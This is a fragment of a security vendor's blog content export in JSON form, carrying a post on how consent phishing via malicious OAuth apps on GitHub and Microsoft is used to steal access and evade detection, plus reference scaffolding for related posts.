",{"data":106718,"content":106720,"nodeType":186},{"uri":106719},"https://github.com/pushsecurity/saas-attacks?tab=readme-ov-file",[106721],{"data":106722,"marks":106723,"value":88245,"nodeType":173},{},[106724],{"type":194},{"data":106726,"marks":106727,"value":106728,"nodeType":173},{},[],", where attackers trick users into authorizing malicious OAuth apps. ",{"data":106730,"content":106731,"nodeType":178},{},[106732,106736,106745],{"data":106733,"marks":106734,"value":106735,"nodeType":173},{},[],"The attacker sends a phishing link to a target that requests permissions to access sensitive data or permissions to perform dangerous actions for an app the victim is using. If the target grants consent for the permissions, the adversary gains that level of access over the target’s account — and certain data and functionality ",{"data":106737,"content":106739,"nodeType":186},{"uri":106738},"https://pushsecurity.com/blog/the-risky-terrain-of-oauth-scopes-in-third-party/",[106740],{"data":106741,"marks":106742,"value":106744,"nodeType":173},{},[106743],{"type":194},"depending on the scopes granted",{"data":106746,"marks":106747,"value":106748,"nodeType":173},{},[],". This attack bypasses MFA entirely (including phishing-resistant MFA) by sidestepping the login process — think of it as an authorization attack, as opposed to an authentication one. Naturally, this means it also persists through typical authentication changes like a password reset. ",{"data":106750,"content":106751,"nodeType":178},{},[106752],{"data":106753,"marks":106754,"value":106755,"nodeType":173},{},[],"Consent phishing has been primarily aimed at getting access to larger cloud platforms like Microsoft Azure or Google Workspace tenants, or more complex apps like GitHub. These apps present an obvious opportunity to attackers in terms of the functionality and and data they contain.  ",{"data":106757,"content":106758,"nodeType":178},{},[106759],{"data":106760,"marks":106761,"value":106762,"nodeType":173},{},[],"Two separate cases of consent phishing have hit the headlines this month representing very different use cases — let’s compare them. ",{"data":106764,"content":106765,"nodeType":231},{},[],{"data":106767,"content":106768,"nodeType":169},{},[106769],{"data":106770,"marks":106771,"value":106773,"nodeType":173},{},[106772],{"type":370},"1. Classic consent phishing",{"data":106775,"content":106776,"nodeType":178},{},[106777],{"data":106778,"marks":106779,"value":106780,"nodeType":173},{},[],"Attackers targeted GitHub users across 12,000 repositories by creating fake security alert issues in GitHub repositories. These legit-looking alerts send the victim to a GitHub authorization page for a \"gitsecurityapp\" OAuth app that requests a lot of very risky scopes granting full access to a user's account and repositories.",{"data":106782,"content":106786,"nodeType":312},{"target":106783},{"sys":106784},{"id":106785,"type":317,"linkType":318},"7s7VLePAQzhzXJ6cFkSCAe",[],{"data":106788,"content":106792,"nodeType":312},{"target":106789},{"sys":106790},{"id":106791,"type":317,"linkType":318},"5dppSzNOgffeZTZK2lG6V5",[],{"data":106794,"content":106798,"nodeType":312},{"target":106795},{"sys":106796},{"id":106797,"type":317,"linkType":318},"1dsYU7bM5mPW1AXyRLnqpp",[],{"data":106800,"content":106801,"nodeType":178},{},[106802],{"data":106803,"marks":106804,"value":106805,"nodeType":173},{},[],"Once authorized, the attacker has extensive access to the account, from which point they can modify repositories to conduct further attacks against users (e.g. by infecting them with malware), poison the repos and services connected to the repository, and exfiltrate any sensitive data the account has access to. ",{"data":106807,"content":106808,"nodeType":178},{},[106809,106813,106822],{"data":106810,"marks":106811,"value":106812,"nodeType":173},{},[],"Alongside consent phishing, this is an example of ",{"data":106814,"content":106816,"nodeType":186},{"uri":106815},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/in-app_phishing/description.md",[106817],{"data":106818,"marks":106819,"value":106821,"nodeType":173},{},[106820],{"type":194},"in-app phishing",{"data":106823,"marks":106824,"value":106825,"nodeType":173},{},[],", which avoids delivering the message via corporate email. Even if the target gets an email notification, the phish isn’t delivered via email directly, and so email-based scanning solutions won’t detect it — they’ll receive a legitimate notification email directly from GitHub. It’s also less likely to raise suspicion as GitHub issue notifications are expected, increasing the click chance. ",{"data":106827,"content":106831,"nodeType":312},{"target":106828},{"sys":106829},{"id":106830,"type":317,"linkType":318},"6d6MMyPQ7vaY2KrJTHGeO6",[],{"data":106833,"content":106834,"nodeType":231},{},[],{"data":106836,"content":106837,"nodeType":169},{},[106838],{"data":106839,"marks":106840,"value":106842,"nodeType":173},{},[106841],{"type":370},"2. Not really consent phishing?",{"data":106844,"content":106845,"nodeType":178},{},[106846],{"data":106847,"marks":106848,"value":106849,"nodeType":173},{},[],"This example is much more unusual. In this case, the attacker used malicious Microsoft OAuth apps impersonating Adobe and DocuSign. ",{"data":106851,"content":106852,"nodeType":178},{},[106853],{"data":106854,"marks":106855,"value":106856,"nodeType":173},{},[],"Rather than trying to grab lots of juicy permissions for Microsoft, the attacker used consent phishing to prevent automated analysis of their phishing page by security tools. To be served the real phishing page, you need to first authorize the fake OAuth app — meaning that security tools and bots won’t be able to reach the page to determine if it’s malicious or not. ",{"data":106858,"content":106859,"nodeType":178},{},[106860],{"data":106861,"marks":106862,"value":106863,"nodeType":173},{},[],"The attack started with attackers sending phishing emails to target users with a fake password reset lure. ",{"data":106865,"content":106869,"nodeType":312},{"target":106866},{"sys":106867},{"id":106868,"type":317,"linkType":318},"3cLd6EbraN9fKuGgL0kkgC",[],{"data":106871,"content":106872,"nodeType":178},{},[106873],{"data":106874,"marks":106875,"value":106876,"nodeType":173},{},[],"Because the initial phishing link directs to the legitimate login.microsoftonline.com URL, it appears legitimate and bypasses common domain-based security checks. ",{"data":106878,"content":106879,"nodeType":178},{},[106880],{"data":106881,"marks":106882,"value":106883,"nodeType":173},{},[],"After clicking the link, the user signs into their real Microsoft account (this might even happen automatically if the user is already signed in on the device/browser they’re using). They are then redirected to a permissions request page for the fake OAuth app. ",{"data":106885,"content":106889,"nodeType":312},{"target":106886},{"sys":106887},{"id":106888,"type":317,"linkType":318},"6O4CSx1VCoPAIjjsnKzu75",[],{"data":106891,"content":106892,"nodeType":178},{},[106893],{"data":106894,"marks":106895,"value":106896,"nodeType":173},{},[],"The permissions requested by the app (profile, email, openid) are so limited as to be basically unexploitable. They are also the same permissions you would accept if you were authorizing Microsoft to perform a social login (SSO via OIDC) to a third party app.",{"data":106898,"content":106899,"nodeType":178},{},[106900,106904,106911],{"data":106901,"marks":106902,"value":106903,"nodeType":173},{},[],"Clicking the link redirects the victim to the malicious page but masks it using the legit Cloudflare Turnstile service. As well as making the page look more credible (since its fronted by a legit service to block bots) this is a common detection evasion technique we’ve ",{"data":106905,"content":106906,"nodeType":186},{"uri":74693},[106907],{"data":106908,"marks":106909,"value":70035,"nodeType":173},{},[106910],{"type":194},{"data":106912,"marks":106913,"value":106914,"nodeType":173},{},[]," which prevents security solutions from accessing and analysing the malicious page. ",{"data":106916,"content":106919,"nodeType":312},{"target":106917},{"sys":106918},{"id":69500,"type":317,"linkType":318},[],{"data":106921,"content":106922,"nodeType":178},{},[106923],{"data":106924,"marks":106925,"value":106926,"nodeType":173},{},[],"After completing the verification, the page (and the malicious phishing kit element) is finally loaded. If the victim authenticates, the session will be stolen by the attacker, along with the captured credentials and MFA code. ",{"data":106928,"content":106929,"nodeType":231},{},[],{"data":106931,"content":106932,"nodeType":169},{},[106933],{"data":106934,"marks":106935,"value":106937,"nodeType":173},{},[106936],{"type":370},"Using consent phishing to evade detection",{"data":106939,"content":106940,"nodeType":178},{},[106941],{"data":106942,"marks":106943,"value":106944,"nodeType":173},{},[],"The attacker is essentially using their fake OAuth app to prevent security analysts and bots from analysing the real phishing page, because the first page loaded is a link to a legitimate Microsoft domain. They’re also layering it with a range of other detection evasion techniques like using Cloudflare Turnstile.  ",{"data":106946,"content":106950,"nodeType":312},{"target":106947},{"sys":106948},{"id":106949,"type":317,"linkType":318},"4Bi9YoMwWVmKoWfkh5tiTA",[],{"data":106952,"content":106953,"nodeType":178},{},[106954],{"data":106955,"marks":106956,"value":106957,"nodeType":173},{},[],"We’ve previously blogged about how attackers are using layered detection evasion techniques to circumvent typical phishing page detections, which are often email-based, including:",{"data":106959,"content":106960,"nodeType":250},{},[106961,106982],{"data":106962,"content":106963,"nodeType":254},{},[106964],{"data":106965,"content":106966,"nodeType":178},{},[106967,106970,106978],{"data":106968,"marks":106969,"value":37,"nodeType":173},{},[],{"data":106971,"content":106972,"nodeType":186},{"uri":74693},[106973],{"data":106974,"marks":106975,"value":106977,"nodeType":173},{},[106976],{"type":194},"Prevent analysis of phishing pages",{"data":106979,"marks":106980,"value":106981,"nodeType":173},{},[]," by security bots, including using legitimate services like Cloudflare Workers and Turnstile (as above), CAPTCHA, and various sandbox-aware techniques to ensure only the intended victim is served the phishing page, such as only providing the correct parameters to load the page if the correct path is followed (rather than attempting to load the malicious page by going directly to the domain). ",{"data":106983,"content":106984,"nodeType":254},{},[106985],{"data":106986,"content":106987,"nodeType":178},{},[106988,106991,106999],{"data":106989,"marks":106990,"value":37,"nodeType":173},{},[],{"data":106992,"content":106993,"nodeType":186},{"uri":97747},[106994],{"data":106995,"marks":106996,"value":106998,"nodeType":173},{},[106997],{"type":194},"DOM and visual obfuscation",{"data":107000,"marks":107001,"value":107002,"nodeType":173},{},[]," of phishing pages when the victim does land on the page to prevent it from being identified as malicious through signature-based detection of page elements. ",{"data":107004,"content":107008,"nodeType":312},{"target":107005},{"sys":107006},{"id":107007,"type":317,"linkType":318},"2dN8np5odBecf7r1vBr69K",[],{"data":107010,"content":107011,"nodeType":178},{},[107012],{"data":107013,"marks":107014,"value":107015,"nodeType":173},{},[],"This seems a bit overkill and many of the steps here are likely to raise suspicion — like the fact that you’re never asked to provide the original code for the password reset, and are asked to unexpectedly consent to an OAuth app. But clearly, the attacker is more concerned about bypassing technical safeguards than human ones (not a great endorsement for the state of phishing awareness training). ",{"data":107017,"content":107018,"nodeType":231},{},[],{"data":107020,"content":107021,"nodeType":169},{},[107022],{"data":107023,"marks":107024,"value":107026,"nodeType":173},{},[107025],{"type":370},"How Push detects and blocks phishing attacks",{"data":107028,"content":107029,"nodeType":178},{},[107030],{"data":107031,"marks":107032,"value":107033,"nodeType":173},{},[],"Push overcomes the various detection evasion techniques shown here by using in-browser detections based on the phishing page that the user sees. This means that no matter where the user accesses the link from (email, IM platform, social media, or anywhere else on the internet) Push can observe and analyse the page to determine if it's malicious. ",{"data":107035,"content":107036,"nodeType":178},{},[107037],{"data":107038,"marks":107039,"value":107040,"nodeType":173},{},[],"Push uses layered detections based on identifying the phishing kit running on the page itself, whether the page is cloned from a legitimate login page, as well as detecting whether the credentials being entered on the page have been used to log into your SSO account previously. ",{"data":107042,"content":107046,"nodeType":312},{"target":107043},{"sys":107044},{"id":107045,"type":317,"linkType":318},"6B1toQAf44rDzQZijYRd9g",[],{"data":107048,"content":107051,"nodeType":312},{"target":107049},{"sys":107050},{"id":98287,"type":317,"linkType":318},[],{"data":107053,"content":107057,"nodeType":312},{"target":107054},{"sys":107055},{"id":107056,"type":317,"linkType":318},"01musWa3FUiO0CVFNWfwcy",[],{"data":107059,"content":107060,"nodeType":231},{},[],{"data":107062,"content":107063,"nodeType":169},{},[107064],{"data":107065,"marks":107066,"value":107068,"nodeType":173},{},[107067],{"type":370},"Using Push to review OAuth integrations",{"data":107070,"content":107071,"nodeType":178},{},[107072],{"data":107073,"marks":107074,"value":107075,"nodeType":173},{},[],"You can also use Push to discover and remove risky OAuth integrations accepted by your users. ",{"data":107077,"content":107081,"nodeType":312},{"target":107078},{"sys":107079},{"id":107080,"type":317,"linkType":318},"5kJvy5SBcWLrK2EhLyR1ZD",[],{"data":107083,"content":107084,"nodeType":178},{},[107085],{"data":107086,"marks":107087,"value":107088,"nodeType":173},{},[],"This shows which OAuth apps have been added, which apps they are integrated with, what permissions they’ve been granted, as well as other properties that indicate risk (e.g. whether the app’s publisher has been verified). ",{"data":107090,"content":107091,"nodeType":178},{},[107092],{"data":107093,"marks":107094,"value":107095,"nodeType":173},{},[],"If your users are consent phished, you’ll be notified via webhook event that a new integration has been added. These risky integrations can be removed via the Push platform by clicking ‘delete integration’. ",{"data":107097,"content":107098,"nodeType":231},{},[],{"data":107100,"content":107101,"nodeType":169},{},[107102],{"data":107103,"marks":107104,"value":461,"nodeType":173},{},[107105],{"type":370},{"data":107107,"content":107108,"nodeType":178},{},[107109],{"data":107110,"marks":107111,"value":98309,"nodeType":173},{},[],{"data":107113,"content":107114,"nodeType":178},{},[107115,107118,107125],{"data":107116,"marks":107117,"value":61741,"nodeType":173},{},[],{"data":107119,"content":107120,"nodeType":186},{"uri":77659},[107121],{"data":107122,"marks":107123,"value":476,"nodeType":173},{},[107124],{"type":194},{"data":107126,"marks":107127,"value":69758,"nodeType":173},{},[],"How consent phishing is evolving to defeat detection controls","Consent phishing is where attackers trick users into authorizing access for malicious OAuth apps. Here's how attackers are using this technique in the wild.","2025-03-31T00:00:00.000Z","how-consent-phishing-is-evolving",{"items":107133},[107134,107136],{"sys":107135,"name":505},{"id":504},{"sys":107137,"name":509},{"id":508},{"items":107139},[107140],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":107141},{"url":1496},{"items":107143},[107144],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":107145},{"url":1496},{"json":107147,"links":107733},{"nodeType":165,"data":107148,"content":107149},{},[107150,107186,107192,107198,107224,107230,107233,107240,107256,107261,107267,107273,107279,107282,107289,107295,107311,107317,107322,107325,107332,107338,107397,107403,107406,107413,107419,107425,107524,107530,107533,107540,107566,107572,107575,107582,107588,107604,107610,107613,107620,107626,107631,107637,107642,107648,107689,107695,107701,107704,107711,107717],{"nodeType":178,"data":107151,"content":107152},{},[107153,107156,107163,107166,107173,107176,107183],{"nodeType":173,"value":96476,"marks":107154,"data":107155},[],{},{"nodeType":186,"data":107157,"content":107158},{"uri":96481},[107159],{"nodeType":173,"value":1255,"marks":107160,"data":107162},[107161],{"type":194},{},{"nodeType":173,"value":2936,"marks":107164,"data":107165},[],{},{"nodeType":186,"data":107167,"content":107168},{"uri":96492},[107169],{"nodeType":173,"value":96495,"marks":107170,"data":107172},[107171],{"type":194},{},{"nodeType":173,"value":3949,"marks":107174,"data":107175},[],{},{"nodeType":186,"data":107177,"content":107178},{"uri":96504},[107179],{"nodeType":173,"value":96507,"marks":107180,"data":107182},[107181],{"type":194},{},{"nodeType":173,"value":96512,"marks":107184,"data":107185},[],{},{"nodeType":178,"data":107187,"content":107188},{},[107189],{"nodeType":173,"value":96519,"marks":107190,"data":107191},[],{},{"nodeType":178,"data":107193,"content":107194},{},[107195],{"nodeType":173,"value":96526,"marks":107196,"data":107197},[],{},{"nodeType":178,"data":107199,"content":107200},{},[107201,107204,107211,107214,107221],{"nodeType":173,"value":96533,"marks":107202,"data":107203},[],{},{"nodeType":186,"data":107205,"content":107206},{"uri":61610},[107207],{"nodeType":173,"value":96540,"marks":107208,"data":107210},[107209],{"type":194},{},{"nodeType":173,"value":96545,"marks":107212,"data":107213},[],{},{"nodeType":186,"data":107215,"content":107216},{"uri":88239},[107217],{"nodeType":173,"value":88245,"marks":107218,"data":107220},[107219],{"type":194},{},{"nodeType":173,"value":96556,"marks":107222,"data":107223},[],{},{"nodeType":178,"data":107225,"content":107226},{},[107227],{"nodeType":173,"value":96563,"marks":107228,"data":107229},[],{},{"nodeType":231,"data":107231,"content":107232},{},[],{"nodeType":169,"data":107234,"content":107235},{},[107236],{"nodeType":173,"value":96573,"marks":107237,"data":107239},[107238],{"type":370},{},{"nodeType":178,"data":107241,"content":107242},{},[107243,107246,107253],{"nodeType":173,"value":96581,"marks":107244,"data":107245},[],{},{"nodeType":186,"data":107247,"content":107248},{"uri":96586},[107249],{"nodeType":173,"value":96589,"marks":107250,"data":107252},[107251],{"type":194},{},{"nodeType":173,"value":96594,"marks":107254,"data":107255},[],{},{"nodeType":312,"data":107257,"content":107260},{"target":107258},{"sys":107259},{"id":96601,"type":317,"linkType":318},[],{"nodeType":178,"data":107262,"content":107263},{},[107264],{"nodeType":173,"value":96607,"marks":107265,"data":107266},[],{},{"nodeType":178,"data":107268,"content":107269},{},[107270],{"nodeType":173,"value":96614,"marks":107271,"data":107272},[],{},{"nodeType":178,"data":107274,"content":107275},{},[107276],{"nodeType":173,"value":96621,"marks":107277,"data":107278},[],{},{"nodeType":231,"data":107280,"content":107281},{},[],{"nodeType":169,"data":107283,"content":107284},{},[107285],{"nodeType":173,"value":96631,"marks":107286,"data":107288},[107287],{"type":370},{},{"nodeType":178,"data":107290,"content":107291},{},[107292],{"nodeType":173,"value":96639,"marks":107293,"data":107294},[],{},{"nodeType":178,"data":107296,"content":107297},{},[107298,107301,107308],{"nodeType":173,"value":96646,"marks":107299,"data":107300},[],{},{"nodeType":186,"data":107302,"content":107303},{"uri":96651},[107304],{"nodeType":173,"value":96654,"marks":107305,"data":107307},[107306],{"type":194},{},{"nodeType":173,"value":96659,"marks":107309,"data":107310},[],{},{"nodeType":178,"data":107312,"content":107313},{},[107314],{"nodeType":173,"value":96666,"marks":107315,"data":107316},[],{},{"nodeType":312,"data":107318,"content":107321},{"target":107319},{"sys":107320},{"id":96673,"type":317,"linkType":318},[],{"nodeType":231,"data":107323,"content":107324},{},[],{"nodeType":169,"data":107326,"content":107327},{},[107328],{"nodeType":173,"value":96682,"marks":107329,"data":107331},[107330],{"type":370},{},{"nodeType":178,"data":107333,"content":107334},{},[107335],{"nodeType":173,"value":96690,"marks":107336,"data":107337},[],{},{"nodeType":250,"data":107339,"content":107340},{},[107341,107350,107359,107368],{"nodeType":254,"data":107342,"content":107343},{},[107344],{"nodeType":178,"data":107345,"content":107346},{},[107347],{"nodeType":173,"value":96703,"marks":107348,"data":107349},[],{},{"nodeType":254,"data":107351,"content":107352},{},[107353],{"nodeType":178,"data":107354,"content":107355},{},[107356],{"nodeType":173,"value":96713,"marks":107357,"data":107358},[],{},{"nodeType":254,"data":107360,"content":107361},{},[107362],{"nodeType":178,"data":107363,"content":107364},{},[107365],{"nodeType":173,"value":96723,"marks":107366,"data":107367},[],{},{"nodeType":254,"data":107369,"content":107370},{},[107371],{"nodeType":178,"data":107372,"content":107373},{},[107374,107377,107384,107387,107394],{"nodeType":173,"value":96733,"marks":107375,"data":107376},[],{},{"nodeType":186,"data":107378,"content":107379},{"uri":96738},[107380],{"nodeType":173,"value":96741,"marks":107381,"data":107383},[107382],{"type":194},{},{"nodeType":173,"value":96746,"marks":107385,"data":107386},[],{},{"nodeType":186,"data":107388,"content":107389},{"uri":96751},[107390],{"nodeType":173,"value":96754,"marks":107391,"data":107393},[107392],{"type":194},{},{"nodeType":173,"value":481,"marks":107395,"data":107396},[],{},{"nodeType":178,"data":107398,"content":107399},{},[107400],{"nodeType":173,"value":96765,"marks":107401,"data":107402},[],{},{"nodeType":231,"data":107404,"content":107405},{},[],{"nodeType":169,"data":107407,"content":107408},{},[107409],{"nodeType":173,"value":96775,"marks":107410,"data":107412},[107411],{"type":370},{},{"nodeType":178,"data":107414,"content":107415},{},[107416],{"nodeType":173,"value":96783,"marks":107417,"data":107418},[],{},{"nodeType":178,"data":107420,"content":107421},{},[107422],{"nodeType":173,"value":96790,"marks":107423,"data":107424},[],{},{"nodeType":250,"data":107426,"content":107427},{},[107428,107447,107476,107495],{"nodeType":254,"data":107429,"content":107430},{},[107431],{"nodeType":178,"data":107432,"content":107433},{},[107434,107437,107444],{"nodeType":173,"value":96803,"marks":107435,"data":107436},[],{},{"nodeType":186,"data":107438,"content":107439},{"uri":59347},[107440],{"nodeType":173,"value":59350,"marks":107441,"data":107443},[107442],{"type":194},{},{"nodeType":173,"value":96814,"marks":107445,"data":107446},[],{},{"nodeType":254,"data":107448,"content":107449},{},[107450],{"nodeType":178,"data":107451,"content":107452},{},[107453,107456,107463,107466,107473],{"nodeType":173,"value":37,"marks":107454,"data":107455},[],{},{"nodeType":186,"data":107457,"content":107458},{"uri":19838},[107459],{"nodeType":173,"value":39940,"marks":107460,"data":107462},[107461],{"type":194},{},{"nodeType":173,"value":61650,"marks":107464,"data":107465},[],{},{"nodeType":186,"data":107467,"content":107468},{"uri":61655},[107469],{"nodeType":173,"value":61658,"marks":107470,"data":107472},[107471],{"type":194},{},{"nodeType":173,"value":61663,"marks":107474,"data":107475},[],{},{"nodeType":254,"data":107477,"content":107478},{},[107479],{"nodeType":178,"data":107480,"content":107481},{},[107482,107485,107492],{"nodeType":173,"value":37,"marks":107483,"data":107484},[],{},{"nodeType":186,"data":107486,"content":107487},{"uri":9275},[107488],{"nodeType":173,"value":9278,"marks":107489,"data":107491},[107490],{"type":194},{},{"nodeType":173,"value":61683,"marks":107493,"data":107494},[],{},{"nodeType":254,"data":107496,"content":107497},{},[107498],{"nodeType":178,"data":107499,"content":107500},{},[107501,107504,107511,107514,107521],{"nodeType":173,"value":37,"marks":107502,"data":107503},[],{},{"nodeType":186,"data":107505,"content":107506},{"uri":61697},[107507],{"nodeType":173,"value":57951,"marks":107508,"data":107510},[107509],{"type":194},{},{"nodeType":173,"value":61704,"marks":107512,"data":107513},[],{},{"nodeType":186,"data":107515,"content":107516},{"uri":61709},[107517],{"nodeType":173,"value":61712,"marks":107518,"data":107520},[107519],{"type":194},{},{"nodeType":173,"value":61717,"marks":107522,"data":107523},[],{},{"nodeType":178,"data":107525,"content":107526},{},[107527],{"nodeType":173,"value":96898,"marks":107528,"data":107529},[],{},{"nodeType":231,"data":107531,"content":107532},{},[],{"nodeType":169,"data":107534,"content":107535},{},[107536],{"nodeType":173,"value":40632,"marks":107537,"data":107539},[107538],{"type":370},{},{"nodeType":178,"data":107541,"content":107542},{},[107543,107546,107553,107556,107563],{"nodeType":173,"value":96915,"marks":107544,"data":107545},[],{},{"nodeType":186,"data":107547,"content":107548},{"uri":832},[107549],{"nodeType":173,"value":835,"marks":107550,"data":107552},[107551],{"type":194},{},{"nodeType":173,"value":96926,"marks":107554,"data":107555},[],{},{"nodeType":186,"data":107557,"content":107558},{"uri":61157},[107559],{"nodeType":173,"value":39789,"marks":107560,"data":107562},[107561],{"type":194},{},{"nodeType":173,"value":96937,"marks":107564,"data":107565},[],{},{"nodeType":178,"data":107567,"content":107568},{},[107569],{"nodeType":173,"value":96944,"marks":107570,"data":107571},[],{},{"nodeType":231,"data":107573,"content":107574},{},[],{"nodeType":169,"data":107576,"content":107577},{},[107578],{"nodeType":173,"value":8299,"marks":107579,"data":107581},[107580],{"type":370},{},{"nodeType":178,"data":107583,"content":107584},{},[107585],{"nodeType":173,"value":96961,"marks":107586,"data":107587},[],{},{"nodeType":178,"data":107589,"content":107590},{},[107591,107594,107601],{"nodeType":173,"value":96968,"marks":107592,"data":107593},[],{},{"nodeType":186,"data":107595,"content":107596},{"uri":96973},[107597],{"nodeType":173,"value":96976,"marks":107598,"data":107600},[107599],{"type":194},{},{"nodeType":173,"value":96981,"marks":107602,"data":107603},[],{},{"nodeType":178,"data":107605,"content":107606},{},[107607],{"nodeType":173,"value":96988,"marks":107608,"data":107609},[],{},{"nodeType":231,"data":107611,"content":107612},{},[],{"nodeType":169,"data":107614,"content":107615},{},[107616],{"nodeType":173,"value":1422,"marks":107617,"data":107619},[107618],{"type":370},{},{"nodeType":178,"data":107621,"content":107622},{},[107623],{"nodeType":173,"value":97005,"marks":107624,"data":107625},[],{},{"nodeType":312,"data":107627,"content":107630},{"target":107628},{"sys":107629},{"id":97012,"type":317,"linkType":318},[],{"nodeType":178,"data":107632,"content":107633},{},[107634],{"nodeType":173,"value":97018,"marks":107635,"data":107636},[],{},{"nodeType":312,"data":107638,"content":107641},{"target":107639},{"sys":107640},{"id":97025,"type":317,"linkType":318},[],{"nodeType":178,"data":107643,"content":107644},{},[107645],{"nodeType":173,"value":97031,"marks":107646,"data":107647},[],{},{"nodeType":250,"data":107649,"content":107650},{},[107651,107670],{"nodeType":254,"data":107652,"content":107653},{},[107654],{"nodeType":178,"data":107655,"content":107656},{},[107657,107660,107667],{"nodeType":173,"value":37,"marks":107658,"data":107659},[],{},{"nodeType":186,"data":107661,"content":107662},{"uri":96586},[107663],{"nodeType":173,"value":96589,"marks":107664,"data":107666},[107665],{"type":194},{},{"nodeType":173,"value":37,"marks":107668,"data":107669},[],{},{"nodeType":254,"data":107671,"content":107672},{},[107673],{"nodeType":178,"data":107674,"content":107675},{},[107676,107679,107686],{"nodeType":173,"value":37,"marks":107677,"data":107678},[],{},{"nodeType":186,"data":107680,"content":107681},{"uri":97067},[107682],{"nodeType":173,"value":97070,"marks":107683,"data":107685},[107684],{"type":194},{},{"nodeType":173,"value":37,"marks":107687,"data":107688},[],{},{"nodeType":178,"data":107690,"content":107691},{},[107692],{"nodeType":173,"value":97081,"marks":107693,"data":107694},[],{},{"nodeType":178,"data":107696,"content":107697},{},[107698],{"nodeType":173,"value":97088,"marks":107699,"data":107700},[],{},{"nodeType":231,"data":107702,"content":107703},{},[],{"nodeType":169,"data":107705,"content":107706},{},[107707],{"nodeType":173,"value":97098,"marks":107708,"data":107710},[107709],{"type":370},{},{"nodeType":178,"data":107712,"content":107713},{},[107714],{"nodeType":173,"value":97106,"marks":107715,"data":107716},[],{},{"nodeType":178,"data":107718,"content":107719},{},[107720,107723,107730],{"nodeType":173,"value":61741,"marks":107721,"data":107722},[],{},{"nodeType":186,"data":107724,"content":107725},{"uri":97117},[107726],{"nodeType":173,"value":1472,"marks":107727,"data":107729},[107728],{"type":194},{},{"nodeType":173,"value":1477,"marks":107731,"data":107732},[],{},{"entries":107734},{"hyperlink":107735,"inline":107736,"block":107737},[],[],[107738,107745,107752,107758],{"sys":107739,"__typename":5345,"title":107740,"caption":107741,"layoutMode":118,"file":107742},{"id":96601},"Creating an ASP in Google","Creating an ASP for a Google account",{"url":107743,"width":5358,"height":107744},"https://images.ctfassets.net/y1cdw1ablpvd/3fMIrxHzMvOH5bE4Xb4mNO/ae1b57f12534c3abdeca4dd54ddcb77f/image3.png",1118,{"sys":107746,"__typename":5345,"title":107747,"caption":107748,"layoutMode":118,"file":107749},{"id":96673},"ASP phishing lure","A highly convincing ASP phishing lure used in a targeted attack",{"url":107750,"width":107751,"height":49163},"https://images.ctfassets.net/y1cdw1ablpvd/46CywsxmjD6CfOHkGjyTiF/01d6d255dd82a4df7f0f81e97817c761/image1.png",1570,{"sys":107753,"__typename":5345,"title":107754,"caption":107754,"layoutMode":118,"file":107755},{"id":97012},"Configuring URL blocking for ASP creation pages",{"url":107756,"width":5358,"height":107757},"https://images.ctfassets.net/y1cdw1ablpvd/1Psq6fCOCTr8lDFl0USd9a/b2171432f2ce2b812be4f339c0d74b71/image2.png",1402,{"sys":107759,"__typename":5345,"title":107760,"caption":107761,"layoutMode":118,"file":107762},{"id":97025},"URL blocking message","Customizable message that the user sees when trying to access a blocked URL",{"url":107763,"width":107744,"height":107764},"https://images.ctfassets.net/y1cdw1ablpvd/1b5DZjswtUn8gBc2XQfsBp/2ac0dcc25029cf887b69d253419e6970/image4.png",376,"content:blog:app-specific-password-phishing.json","blog/app-specific-password-phishing.json","blog/app-specific-password-phishing",{"_path":107769,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":107770,"ogImage":118,"summary":107772,"title":93520,"subtitle":118,"metaTitle":93520,"synopsis":93521,"hashTags":118,"publishedDate":93522,"slug":93523,"tagsCollection":107783,"relatedBlogPostsCollection":107789,"authorsCollection":108954,"content":108958,"_id":109520,"_type":5439,"_source":5440,"_file":109521,"_stem":109522,"_extension":5439},"/blog/how-browser-level-controls-change-the-fight-against-phishing",{"id":92907,"publishedAt":107771},"2025-06-26T09:59:32.902Z",{"json":107773},{"data":107774,"content":107775,"nodeType":165},{},[107776],{"data":107777,"content":107778,"nodeType":178},{},[107779],{"data":107780,"marks":107781,"value":107782,"nodeType":173},{},[],"Attackers have moved their phishing attacks out of the mailbox and are finding ever more ways to defeat conventional email, network, and endpoint-based security controls. Here's how browser-based security platforms can level the playing field and help security teams to stay ahead of the never-ending barrage of phishing attacks. ",{"items":107784},[107785,107787],{"sys":107786,"name":505},{"id":504},{"sys":107788,"name":509},{"id":508},{"items":107790},[107791,108363,108668],{"__typename":1528,"sys":107792,"content":107793,"title":98341,"synopsis":98342,"hashTags":118,"publishedDate":98343,"slug":98344,"tagsCollection":108353,"authorsCollection":108359},{"id":97694},{"json":107794},{"nodeType":165,"data":107795,"content":107796},{},[107797,107803,107809,107815,107818,107825,107831,107847,107877,107882,107898,107903,107923,107926,107933,107939,107952,107965,107970,107976,107982,107987,108000,108003,108010,108016,108022,108028,108034,108037,108044,108050,108056,108072,108078,108085,108124,108130,108135,108141,108146,108152,108155,108162,108175,108181,108215,108225,108228,108235,108241,108247,108277,108283,108300,108305,108310,108313,108320,108326,108342,108347],{"nodeType":178,"data":107798,"content":107799},{},[107800],{"nodeType":173,"value":97703,"marks":107801,"data":107802},[],{},{"nodeType":178,"data":107804,"content":107805},{},[107806],{"nodeType":173,"value":97710,"marks":107807,"data":107808},[],{},{"nodeType":178,"data":107810,"content":107811},{},[107812],{"nodeType":173,"value":97717,"marks":107813,"data":107814},[],{},{"nodeType":231,"data":107816,"content":107817},{},[],{"nodeType":169,"data":107819,"content":107820},{},[107821],{"nodeType":173,"value":97727,"marks":107822,"data":107824},[107823],{"type":370},{},{"nodeType":178,"data":107826,"content":107827},{},[107828],{"nodeType":173,"value":97735,"marks":107829,"data":107830},[],{},{"nodeType":178,"data":107832,"content":107833},{},[107834,107837,107844],{"nodeType":173,"value":97742,"marks":107835,"data":107836},[],{},{"nodeType":186,"data":107838,"content":107839},{"uri":97747},[107840],{"nodeType":173,"value":97750,"marks":107841,"data":107843},[107842],{"type":194},{},{"nodeType":173,"value":97755,"marks":107845,"data":107846},[],{},{"nodeType":250,"data":107848,"content":107849},{},[107850,107859,107868],{"nodeType":254,"data":107851,"content":107852},{},[107853],{"nodeType":178,"data":107854,"content":107855},{},[107856],{"nodeType":173,"value":97768,"marks":107857,"data":107858},[],{},{"nodeType":254,"data":107860,"content":107861},{},[107862],{"nodeType":178,"data":107863,"content":107864},{},[107865],{"nodeType":173,"value":97778,"marks":107866,"data":107867},[],{},{"nodeType":254,"data":107869,"content":107870},{},[107871],{"nodeType":178,"data":107872,"content":107873}